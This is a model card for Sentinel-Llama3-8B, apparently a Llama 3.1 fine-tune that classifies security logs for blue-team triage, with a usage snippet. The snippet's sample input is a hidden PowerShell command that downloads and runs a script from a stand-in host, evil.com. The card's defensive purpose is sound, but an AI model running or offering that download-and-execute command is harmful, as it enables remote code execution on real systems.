Hugging Face's logo

Duong2006
/
sentinel-llama3-8b

Safetensors
English
cybersecurity
log-analysis
threat-detection
blue-team
unsloth
llama-3
Model card Files
xet
 Community

πŸ›‘οΈ Sentinel-Llama3-8B: AI for Cybersecurity Log Analysis

CyberSecurity Model Fine-Tuned

πŸ“– Model Description

Sentinel-Llama3-8B is a specialized Large Language Model (LLM) fine-tuned for Cybersecurity Operations. Built upon the powerful Meta Llama 3.1 8B Instruct architecture, this model has been trained on a diverse dataset of system logs, PowerShell commands, and process execution traces to detect and classify security threats.

This model is designed to assist Blue Teams and SOC Analysts in automating the initial triage of system logs, reducing alert fatigue, and identifying malicious activities with high precision.

πŸ”‘ Key Capabilities

  • Benign vs. Malicious Classification: Accurately distinguishes between normal system administration tasks and potential threats.
  • Threat Categorization: Can classify activities into specific MITRE ATT&CK categories, including:
    • Command and Control (C2)
    • Defense Evasion
    • Ransomware Activity
    • Suspicious Execution
    • Credential Access
  • Low False Positive Rate: Optimized to minimize false alarms on legitimate administrative commands (Benign logs).

πŸ“Š Performance

  • Accuracy: ~82% (on internal test set).
  • Precision (Benign): ~95% (High reliability for filtering safe logs).
  • Recall (Benign): ~98%.

πŸš€ How to Use

You can run this model locally using the unsloth library (recommended for speed) or standard transformers.

Using Unsloth (Fastest Inference) 

from unsloth import FastLanguageModel

# 1. Load Model
model, tokenizer = FastLanguageModel.from_pretrained(
    model_name = "Duong2006/sentinel-llama3-8b",
    max_seq_length = 2048,
    dtype = None,
    load_in_4bit = True,
)
FastLanguageModel.for_inference(model)

# 2. Define Prompt Template
alpaca_prompt = """Below is an instruction that describes a task, paired with an input that provides further context. Write a response that appropriately completes the request.

### Instruction:
{}

### Input:
{}

### Response:
{}"""

# 3. Predict
instruction = "Analyze the following system log event and classify the activity."
input_log = "Process Name: powershell.exe\nCommand Line: powershell.exe -nop -w hidden -c IEX(New-Object Net.WebClient).DownloadString('[http://evil.com/malware.ps1](http://evil.com/malware.ps1)')\nUser: DOMAIN\\Admin"

inputs = tokenizer(
[
    alpaca_prompt.format(instruction, input_log, "")
], return_tensors = "pt").to("cuda")

outputs = model.generate(**inputs, max_new_tokens = 64, use_cache = True)
print(tokenizer.batch_decode(outputs)[0])
Downloads last month

-

Downloads are not tracked for this model. How to track
Inference Providers NEW
This model isn't deployed by any Inference Provider. πŸ™‹ Ask for provider support

Model tree for Duong2006/sentinel-llama3-8b

Base model

meta-llama/Llama-3.1-8B
Finetuned
meta-llama/Llama-3.1-8B-Instruct
Finetuned
(2770)
this model